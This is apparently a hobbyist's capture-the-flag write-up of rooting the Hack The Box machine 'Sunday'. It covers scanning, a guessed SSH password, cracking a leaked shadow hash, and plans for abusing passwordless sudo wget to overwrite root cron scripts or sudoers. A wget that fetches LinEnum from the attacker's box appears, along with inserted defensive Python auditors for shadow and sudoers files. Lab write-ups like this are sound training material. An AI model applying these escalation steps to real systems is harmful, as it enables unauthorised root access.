Completed April 2018
I recommend taking a slow approach to scanning on this one. After doing several regular speed scans, I just felt like I was missing something important, so I re-ran my NMAP scan with nmap -vvv -T2 -p- 10.10.10.76. This was more revealing, and then I could individually scan the known open ports for more detail. The first time I ran a standard full-port nmap, I didn't get the last two ports (for smserverd).
Additionally, NMAP suggests the following for OS:
Aggressive OS guesses: Sun OpenSolaris 2008.11 (94%), Sun Solaris 10 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (90%), Sun Solaris 9 (89%), Sun Solaris 8 (SPARC) (89%)
I attempted a few known vulnerabilities to enumerate what's running on the machine via 111 (sometimes you can see file shares this way), but was unable to get anything back. I started looking at what I knew, and then just honestly took a shot in the dark. This rarely works, but I was able to ssh email@example.com -p 22022 using the password sunday of all freaking things… It was honestly just a shot in the dark, and a convenient reminder that sometimes you don't have to go nuts to figure out a password.
So, the unfortunate thing here is that when I run a find / -name user.txt, I see that the user flag is in sammy's home folder, not sunny's. So, I need to find a way to pivot my access, and to do that I'm going to do some further enumeration on the box.
One of the first things I ever do is run sudo -l to see what I may be able to have elevated privs for.
So, if I try to sudo, I get this:
sunny@sunday:/$ sudo -u root /root/troll
I enumerate further by going ahead and uploading LinEnum. I start an HTTP server on my local box, and identify that wget is installed on the victim box, so I wget http://10.10.14.4:8080/LinEnum.sh, do a chmod 777 LinEnum.sh to make it executable, and then run it with ./LinEnum.sh.
SunOS sunday 5.11 snv_111b i86pc i386 i86pc Solaris
Sammy is a member of the staff group, sunny is a member of the ‘other’ group.
At this point, my standard tools and first look haven't shown me much of what I could find useful. I start some manual enumeration beginning in /. I am actually ashamed to admit that this step hung me up for literally 2 or 3 days because I didn't see the very first listing in the directory and explore it. I went down VNC rabbit holes, was hunting for kernel level exploits, kept trying to figure out how the hell I was going to escalate this without getting the hash for sammy or something. After those two or three days, wouldn't you know it's as simple as heading to /backup where we find a shadow.backup file. Oy. I felt super dumb.
I copied the file over to a .txt and ran it through john. We know from the $5 prefix that this is sha256crypt, so I went ahead and forced the format to save a little time. I used my rockyou.txt wordlist and enforced rules from john.conf, which control how mangling is handled (mangling rules = how it substitutes !s, changes character case, and everything else). This tutorial was most helpful for me in this process: https://pentestlab.blog/2012/07/23/dumping-and-cracking-unix-password-hashes/
JohntheRipper cracked the hash as “cooldude!”
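The $5 the author keys on is the crypt(3) scheme id at the front of each hash. As an added defender-side check (not part of this writeup), the Python below classifies every hash in a leaked shadow copy by that prefix and flags the ones a wordlist run gets through cheaply (DES, md5crypt, or sha-crypt at the default work factor). The shadow lines are constructed placeholders, not the box's file.

```python
import re

# crypt(3) prefix -> scheme name; $5$ is the sha256crypt seen in shadow.backup
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt"}
# Work factor applied when the hash carries no explicit rounds= parameter
DEFAULT_ROUNDS = {"md5crypt": 1000, "sha256crypt": 5000, "sha512crypt": 5000}

# Constructed sample in shadow(5) layout; the hash bodies are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:*LK*:6445::::::
sammy:$5$saltsalt$CONSTRUCTEDPLACEHOLDERHASHxxxxxxxxxxxxxxxxxxxx:6445::::::
sunny:$5$rounds=5000$demosalt$CONSTRUCTEDPLACEHOLDERHASHxxxxxxxxxxxxx:17636::::::
svc:NP:6445::::::
legacy:aaCONSTRUCTED:6445::::::
"""

def classify_hash(field):
    """Return (scheme, rounds) for a shadow password field, or (None, 0) when the
    account has no crackable hash (locked/empty, or the Solaris NP / *LK* markers)."""
    if not field or field in ("NP", "*LK*") or field[0] in "*!":
        return None, 0
    m = re.match(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?", field)
    if not m:
        return "descrypt", 1  # 13-char traditional DES hash carries no $id$ prefix
    scheme = SCHEMES.get(m.group(1), "unknown")
    if scheme == "bcrypt":
        return scheme, 2 ** int(field.split("$")[2])  # $2b$12$... -> cost 12
    if m.group(2):
        return scheme, int(m.group(2))
    return scheme, DEFAULT_ROUNDS.get(scheme, 0)

def audit_shadow(text):
    """One finding per account whose hash could be cracked offline if this file leaks."""
    findings = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 2 or line.startswith("#"):
            continue
        scheme, rounds = classify_hash(parts[1])
        if scheme is None:
            continue
        cheap = scheme in ("descrypt", "md5crypt") or (
            scheme in ("sha256crypt", "sha512crypt") and rounds <= 5000)
        findings.append({"user": parts[0], "scheme": scheme, "rounds": rounds, "cheap": cheap})
    return findings

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        print(f"{f['user']:8} {f['scheme']:12} rounds={f['rounds']:<7} {'CHEAP' if f['cheap'] else 'ok'}")
```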
I just ssh in as sammy, cat user.txt: a3d9498027ca5187ba1793943ee8a598
Now, as we move to root:
Sudo -l is almost always the first command I run – I can sudo w/o a passwd on wget. This is handy. I'm pretty sure I can set up a SimpleHTTPServer on my attack box, and send a script to whatever directory that can either cat root, or throw me a shell as root. The problem here is that sudo is only good for wget, not the chmod or execution, or piping to other things. So, I can only overwrite what's already there. That's good to know at least, but which vector is the easiest one to overwrite to get root?
I did a lot of reading about ways to maybe execute scripts with wget, and it appears sometimes it's possible, but I think with our ultra-limited permissions, and not being able to call anything else, these kept failing.
The last thing I tried on this particular path of “execute as it uploads” was this; I was hopeful, but I cannot concatenate onto things as root, I can only wget.
OK, let’s go back to the drawing board and see what other things that we can overwrite (because keep in mind wget -O overwrites the output files). I’ve had multiple successes in these HTB machines leveraging cronjobs before. Let’s check out what cronjobs are running as root (cronjob -l root)
Sweet, there's an update-refresh.sh that runs every handful of hours. That's a mild annoyance as I may be sitting around waiting for ages for a shell (or in HTB land someone may reset my box while I'm waiting). In that case I just need to see if I can overwrite crontab with one that will run my script of choice every minute or so. There are a few ways I thought of to accomplish this (create a new line in crontab for shell.sh, or replace update-refresh.sh with my own script and let the crontab take care of it, with or without adjusting the timing).
I'm just going to create a new script under the same name on my attack machine, then wget it as root to overwrite the one that's there, since I don't think I can append to it and have permissions work out; so I'll just replace the file that exists and have the automated cron job throw me the shell. Oy. I'm tired of this box. Unfortunately, this thing only runs like every few hours, so I could be waiting around for ages to catch the shell unless I time it right.
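What makes this box fall is a NOPASSWD sudo rule for a program that writes files as root (wget with -O), which is what lets the root-run cron script be replaced. As an added defender-side check that is not part of this writeup, the Python below parses a sudoers fragment and flags such rules; the sudoers sample is constructed, and FILE_WRITERS is my own short list of common file-writing programs, not anything from the box.

```python
import os
import re

# Programs that can write an arbitrary file as the runas user, with the option that does it.
FILE_WRITERS = {"wget": "-O", "curl": "-o", "tee": "stdin", "cp": "dest",
                "mv": "dest", "dd": "of=", "rsync": "dest"}
SUDO_TAGS = ("NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "NOEXEC:", "EXEC:")

# Constructed sudoers fragment; not the box's real file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL) ALL
sunny   ALL=(root) NOPASSWD: /usr/bin/wget
%staff  ALL=(ALL) /usr/bin/pkg
backup  ALL=(root) NOPASSWD: /usr/bin/tee, /usr/bin/pkg refresh
"""

# user host=(runas) [tags:] cmd, cmd ...   (runas part is optional and defaults to root)
RULE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")

def parse_commands(spec):
    """Split the command part of a rule into (nopasswd, [commands]); leading tags only."""
    nopasswd = False
    tokens = spec.split()
    while tokens and tokens[0] in SUDO_TAGS:
        nopasswd = nopasswd or tokens[0] == "NOPASSWD:"
        tokens.pop(0)
    return nopasswd, [c.strip() for c in " ".join(tokens).split(",") if c.strip()]

def audit_sudoers(text):
    """Flag rules giving a non-root principal ALL commands or a file-writing program."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m or m.group(1) == "root":
            continue
        user, runas, spec = m.group(1), m.group(3) or "root", m.group(4)
        nopasswd, cmds = parse_commands(spec)
        for cmd in cmds:
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "ALL commands"
            elif prog in FILE_WRITERS:
                reason = f"{prog} can write any file as {runas} ({FILE_WRITERS[prog]})"
            else:
                continue
            findings.append({"user": user, "runas": runas, "cmd": cmd,
                             "nopasswd": nopasswd, "reason": reason})
    return findings
```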
Also, crontab -e root opens in vi (uggggghhhh). So, I can edit it, it seems, but I could just wait and edit/wget only the shell. How the hell do I generate a crontab out of the box and wget that to overwrite the existing crontab?
I messed around with this for a few days, but never quite got it working, and I'm realizing there may be more than one way to skin this particular cat. So, all I have is wget, right, which means I can GET, PUT or POST with HTTP. Can any of those be worth my time? I looked at FTP with wget as well, but again, execution. There has to be some way to trigger execution with a download or other HTTP request that I just haven't found yet. I still think the crontab method is entirely valid, but it was outside this particular n00b's level of skill and I was ready to just be done with this box entirely. Now that I think about it, there are probably a number of ways to root this box; overwriting the cronjob .sh file, overwriting sudoers/shadow files, to name a few. It depends on how much havoc you want to cause on the machine. I'm trying to build a habit of good OPSEC in my pentests, and I chose the next method because of how much less obvious it is than overwriting something vital like sudoers.
So, the crontab, /etc/passwd, etcetera stuff is really the “right” way to get a shell… but wouldn't you know there's a switch in wget that can read local files. I still don't consider a box rooted unless I can actually catch a shell or get code execution, but this was a nifty little flag I hadn't ever used before (and honestly don't think I will ever have cause to use again, but there you go).